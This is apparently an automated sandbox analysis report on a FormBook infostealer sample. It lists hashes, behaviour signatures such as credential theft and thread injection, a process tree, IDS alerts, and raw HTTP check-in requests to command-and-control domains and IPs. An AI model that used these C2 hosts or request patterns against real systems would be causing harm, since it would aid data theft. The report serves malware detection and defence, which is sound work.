
Windows Analysis Report
3HnH4uJtE7.exe

Overview

General Information

Sample name: 3HnH4uJtE7.exe (renamed because original name is a hash value)
Original sample name: cb8928597d08e9bb6c3c7ee9df7eb836df1f85a9668054765dd6eb75a33516a3.exe
Analysis ID: 1587863
MD5: b88bab75a48b9fefcd3395afa9891d69
SHA1: d35d41a4330b17b8518204a483b8f4800012718a
SHA256: cb8928597d08e9bb6c3c7ee9df7eb836df1f85a9668054765dd6eb75a33516a3
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3HnH4uJtE7.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\3HnH4uJtE7.exe" MD5: B88BAB75A48B9FEFCD3395AFA9891D69)
    • svchost.exe (PID: 6260 cmdline: "C:\Users\user\Desktop\3HnH4uJtE7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • wdFhguqpcrad.exe (PID: 3220 cmdline: "C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wiaacmgr.exe (PID: 348 cmdline: "C:\Windows\SysWOW64\wiaacmgr.exe" MD5: 2F1D379CE47E920BDDD2C50214457E0F)
          • wdFhguqpcrad.exe (PID: 1780 cmdline: "C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4488 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\3HnH4uJtE7.exe", CommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", ParentImage: C:\Users\user\Desktop\3HnH4uJtE7.exe, ParentProcessId: 6988, ParentProcessName: 3HnH4uJtE7.exe, ProcessCommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", ProcessId: 6260, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\3HnH4uJtE7.exe", CommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", ParentImage: C:\Users\user\Desktop\3HnH4uJtE7.exe, ParentProcessId: 6988, ParentProcessName: 3HnH4uJtE7.exe, ProcessCommandLine: "C:\Users\user\Desktop\3HnH4uJtE7.exe", ProcessId: 6260, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T18:51:25.795128+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 185.199.109.153 | 80 | TCP
2025-01-10T18:51:28.331852+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 185.199.109.153 | 80 | TCP
2025-01-10T18:51:30.986881+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 185.199.109.153 | 80 | TCP
2025-01-10T18:51:39.939047+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49811 | 104.21.48.233 | 80 | TCP
2025-01-10T18:51:42.299443+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49824 | 104.21.48.233 | 80 | TCP
2025-01-10T18:51:44.931042+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49835 | 104.21.48.233 | 80 | TCP
2025-01-10T18:51:53.072305+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49882 | 199.59.243.228 | 80 | TCP
2025-01-10T18:51:55.715369+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49898 | 199.59.243.228 | 80 | TCP
2025-01-10T18:51:58.226136+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49913 | 199.59.243.228 | 80 | TCP
2025-01-10T18:52:07.165397+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49965 | 8.136.96.106 | 80 | TCP
2025-01-10T18:52:09.706978+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49981 | 8.136.96.106 | 80 | TCP
2025-01-10T18:52:12.284358+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49994 | 8.136.96.106 | 80 | TCP
2025-01-10T18:52:20.548786+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50019 | 69.57.163.64 | 80 | TCP
2025-01-10T18:52:23.174021+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 69.57.163.64 | 80 | TCP
2025-01-10T18:52:25.681094+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50021 | 69.57.163.64 | 80 | TCP
2025-01-10T18:52:34.654525+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50023 | 170.33.13.246 | 80 | TCP
2025-01-10T18:52:37.266816+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50024 | 170.33.13.246 | 80 | TCP
2025-01-10T18:52:39.932449+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 170.33.13.246 | 80 | TCP
2025-01-10T18:52:48.100839+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50027 | 66.235.200.145 | 80 | TCP
2025-01-10T18:52:50.700863+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50028 | 66.235.200.145 | 80 | TCP
2025-01-10T18:52:53.207752+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50029 | 66.235.200.145 | 80 | TCP
2025-01-10T18:53:02.706420+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50031 | 85.159.66.93 | 80 | TCP
2025-01-10T18:53:05.362913+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50032 | 85.159.66.93 | 80 | TCP
2025-01-10T18:53:07.909571+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50033 | 85.159.66.93 | 80 | TCP
2025-01-10T18:53:15.725954+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50035 | 156.253.8.115 | 80 | TCP
2025-01-10T18:53:18.301031+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50036 | 156.253.8.115 | 80 | TCP
2025-01-10T18:53:21.087237+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 156.253.8.115 | 80 | TCP
2025-01-10T18:53:29.024786+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50039 | 13.248.169.48 | 80 | TCP
2025-01-10T18:53:32.487730+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50040 | 13.248.169.48 | 80 | TCP
2025-01-10T18:53:34.086977+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50041 | 13.248.169.48 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T18:51:30.986881+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 185.199.109.153 | 80 | TCP

                AV Detection

Source: 3HnH4uJtE7.exe; Virustotal: Detection: 69%
Source: 3HnH4uJtE7.exe; ReversingLabs: Detection: 78%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 3HnH4uJtE7.exe; Joe Sandbox ML: detected
Source: 3HnH4uJtE7.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wdFhguqpcrad.exe, 00000003.00000002.3560021834.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3560022524.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003430000.00000004.00001000.00020000.00000000.sdmp, 3HnH4uJtE7.exe, 00000000.00000003.1742033212.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1866930699.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868964920.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.000000000349E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.000000000480E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1962662464.000000000431B000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1964647387.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.0000000004670000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003430000.00000004.00001000.00020000.00000000.sdmp, 3HnH4uJtE7.exe, 00000000.00000003.1742033212.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1963011131.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1866930699.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868964920.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.000000000349E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, wiaacmgr.exe, 00000006.00000002.3561222792.000000000480E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1962662464.000000000431B000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1964647387.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.0000000004670000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdbGCTL source: svchost.exe, 00000001.00000003.1930867669.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1930942129.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560592056.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdb source: svchost.exe, 00000001.00000003.1930867669.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1930942129.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560592056.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2028220729.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2247814449.00000000170EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2028220729.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2247814449.00000000170EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0094DBBE
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_009568EE FindFirstFileW,FindClose,0_2_009568EE
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0095698F
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D076
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0094D3A9
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00959642
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0095979D
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00959B2B
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00955C97
Source: C:\Windows\SysWOW64\wiaacmgr.exe; Code function: 6_2_0069C9D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0069C9D0
Source: C:\Windows\SysWOW64\wiaacmgr.exe; Code function: 4x nop then xor eax, eax (6_2_00689E50)
Source: C:\Windows\SysWOW64\wiaacmgr.exe; Code function: 4x nop then pop edi (6_2_0068E59E)
Source: C:\Windows\SysWOW64\wiaacmgr.exe; Code function: 4x nop then mov ebx, 00000004h (6_2_045604E8)

                Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 185.199.109.153:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 185.199.109.153:80
Source: Network traffic; Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49763 -> 185.199.109.153:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49835 -> 104.21.48.233:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 185.199.109.153:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49898 -> 199.59.243.228:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49811 -> 104.21.48.233:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 8.136.96.106:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 69.57.163.64:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 69.57.163.64:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 156.253.8.115:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49994 -> 8.136.96.106:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 66.235.200.145:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49824 -> 104.21.48.233:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 170.33.13.246:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 66.235.200.145:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49882 -> 199.59.243.228:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49981 -> 8.136.96.106:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 66.235.200.145:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 170.33.13.246:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49913 -> 199.59.243.228:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 69.57.163.64:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 156.253.8.115:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 170.33.13.246:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 156.253.8.115:80
Source: DNS query: www.juewucangku.xyz
Source: DNS query: www.startsomething.xyz
Source: Joe Sandbox View; IP Address: 66.235.200.145
Source: Joe Sandbox View; IP Address: 13.248.169.48
Source: Joe Sandbox View; ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox View; ASN Name: FORTRESSITXUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe; Code function: 0_2_0095CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0095CE44
Source: global traffic; HTTP traffic detected:
    GET /3e00/?Ol=yN0LtN-HDTPXX&3h=vcWi2Nuzfs8bFUYHM3WHAx3tRht2hRDvXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhn1cqd0Bfa9GTR6+v7wltgiOCNeedM3Uw1s= HTTP/1.1
    Host: www.goldbracelet.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81kIy3BeJTiV4odLQ2svXpZKiEE3Qz4K+Ay4=&Ol=yN0LtN-HDTPXX HTTP/1.1
    Host: www.pku-cs-cjw.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g= HTTP/1.1
    Host: www.ausyva4.top
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /cfcv/?3h=yFDcd28s49uqEHKqlww2Cwyic4spmP25HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RH93IVoJN7NWkPDeisF5hKGdeLzaAp6KdnI=&Ol=yN0LtN-HDTPXX HTTP/1.1
    Host: www.969-usedcar02.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX HTTP/1.1
    Host: www.juewucangku.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /9er8/?3h=y0ZQaQGYytoPYKDe8bY9jaat1pADepFe7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaVhngwU9AnEVouJjO4g3krxQAVkSYZ/9aI0=&Ol=yN0LtN-HDTPXX HTTP/1.1
    Host: www.startsomething.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Source: global traffic; HTTP traffic detected:
    GET /3oq9/?3h=2MJNacGdKZTNHNzWrRqovynOPBr8E/IdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHm09siwkoQohFpIo7lKjiy8KvUx5E5SY/z4nc=&Ol=yN0LtN-HDTPXX HTTP/1.1
    Host: www.opro.vip
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
